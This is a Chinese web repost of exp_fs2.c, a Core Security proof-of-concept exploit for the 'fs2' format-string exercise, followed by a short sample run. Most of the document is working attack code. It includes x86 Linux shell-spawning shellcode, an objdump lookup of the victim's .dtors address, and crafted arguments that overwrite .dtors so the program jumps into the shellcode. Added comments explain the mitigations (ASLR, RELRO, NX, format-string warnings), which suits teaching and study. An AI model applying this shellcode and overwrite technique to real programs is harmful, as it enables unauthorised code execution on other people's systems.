
非安全编程演示之格式化字符串

 2006-04-02 20:26:48 来源:WEB开发网   


/*
** exp_fs2.c
** Coded by Core Security - info@core-sec.com
*/


#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs2"
#define GREP "/bin/grep"


/*
 * 24-byte machine-code payload (two 12-byte string literals, concatenated).
 * main() passes this array as the only entry of the victim's environment.
 *
 * Readable from the bytes themselves: the ASCII for "//sh" (2f 2f 73 68) and
 * "/bin" (2f 62 69 6e), then b0 0b / cd 80, i.e. syscall number 0x0b issued
 * through int 0x80 on 32-bit Linux/x86.
 *
 * Defender note: this is a long-published byte sequence; network and host
 * signatures commonly match on it, and a non-executable stack/environment
 * (NX) prevents it from running where it is placed here.
 */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


/*
 * Proof-of-concept driver for the "fs2" format-string exercise.
 *
 * What the visible code does:
 *   1. Derives a guessed payload address from a fixed constant (0xbffffffa)
 *      minus the payload length and the victim path length.
 *   2. Splits that address into its upper and lower 16 bits.
 *   3. Runs objdump | grep to read the victim's .dtors address, then adds 4.
 *   4. Builds two argument strings, each starting with a 4-byte target
 *      address followed by padding whose length encodes one 16-bit half.
 *   5. Replaces this process with the victim via execle(), passing both
 *      strings as argv[1]/argv[2] and an environment holding only shellcode.
 *
 * How fs2 turns these arguments into memory writes is not shown on this
 * page; the victim's source has to be read alongside this file.
 *
 * Preconditions the code bakes in (each is also the matching mitigation):
 *   - Fixed stack top: the address in step 1 is a compile-time guess, so
 *     address space layout randomisation (ASLR) invalidates it.
 *   - Writable .dtors: full RELRO (-Wl,-z,relro,-z,now) maps such tables
 *     read-only; current toolchains also use .fini_array instead of .dtors.
 *   - Executable environment memory: NX / non-executable stack blocks it.
 *   - 32-bit pointers: the "p += 4" after each pointer store assumes
 *     sizeof(void *) == 4.
 *   - On the victim side, never passing caller-controlled data as a format
 *     string (-Wformat -Wformat-security, _FORTIFY_SOURCE) removes the bug.
 *
 * Returns: nothing on success (execle does not return); if execle fails,
 * control falls off the end of main.
 */
int main(void) {
/* Environment for the victim: slot 0 is the payload, remaining slots NULL. */
char *env[3] = {shellcode, NULL};
unsigned int first_half, second_half;
/* temp_buffer holds the objdump command line; the two large buffers become argv[1]/argv[2]. */
char evil_buffer_1[65500], evil_buffer_2[65500], temp_buffer[64];
char *p;
int dtors;
/*
 * Guessed address of the payload in the victim's environment. The path is
 * repeated literally here instead of using VICTIM, so the two must be kept
 * in sync by hand.
 */
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/fs2");
FILE *f;


printf("Shellcode address: 0x%x\n", ret);


/* Split the guessed address into two 16-bit halves (upper half first). */
first_half = (ret & 0xffff0000) >> 16;
printf("\nShellcode address - first half : 0x%x, %u\n", first_half,
first_half);


second_half = ret & 0x0000ffff;
printf("Shellcode address - second half: 0x%x, %u\n", second_half,
second_half);


/*
 * Look up the victim's .dtors address: the first hex number printed by
 * "objdump -t VICTIM | grep dtors" is taken as the address.
 * NOTE(review): the command is built with unbounded sprintf() into a
 * 64-byte buffer and the popen() result is not checked; this is tolerable
 * only because all three components are compile-time constants. exit() is
 * called below without <stdlib.h> being included.
 */
sprintf(temp_buffer, "%s -t %s | %s dtors", OBJDUMP, VICTIM, GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &dtors) != 1) {
pclose(f);
printf("Error: Cannot find .dtors address!\n");
exit(1);
}
/* Target the word 4 bytes past the start of the section. The stream f is not closed on this path. */
dtors += 4;
printf(".dtors address is: 0x%x\n\n", dtors);


/* First buffer: target is dtors + 2, padding length is derived from first_half. */
p = evil_buffer_1;


/* Store the target address in the first bytes of the buffer (assumes 4-byte pointers). */
*((void **)p) = (void *) (dtors + 2);
p += 4;


/*
 * Padding: 4 bytes are already used by the address; the 2 is attributed by
 * the original author to a "%c%c" (presumably in the victim's format
 * string; not shown on this page).
 * NOTE(review): no bounds check. A first_half below 6 wraps the unsigned
 * length to a huge value.
 */
memset(p, 'A', (first_half - 4 - 2));
p += (first_half - 4 - 2);


*p = '\0';


/* Second buffer: target is dtors itself, padding length is derived from second_half. */


p = evil_buffer_2;


*((void **)p) = (void *) (dtors);
p += 4;


/*
 * Same 4 + 2 adjustment as above.
 * NOTE(review): this writes second_half - 1 bytes in total including the
 * terminator, so values above 65501 would run past the 65500-byte array;
 * the sample run on this page (65485) fits.
 */
memset(p, 'B', (second_half - 4 - 2));
p += (second_half - 4 - 2);


*p = '\0';


/* Replace this process with the victim; argv[1]/argv[2] are the two buffers, envp is env. */
execle("/home/user/gera/fs2", "fs2", evil_buffer_1, evil_buffer_2,
NULL, env);
}


运行如下:


user@CoreLabs:~/gera$ gcc fs2.c -o fs2
user@CoreLabs:~/gera$ gcc exp_fs2.c -o exp_fs2
user@CoreLabs:~/gera$ ./exp_fs2


Shellcode address: 0xbfffffcd
Shellcode address - first half : 0xbfff, 49151
Shellcode address - second half: 0xffcd, 65485
.dtors address is: 0x8049590
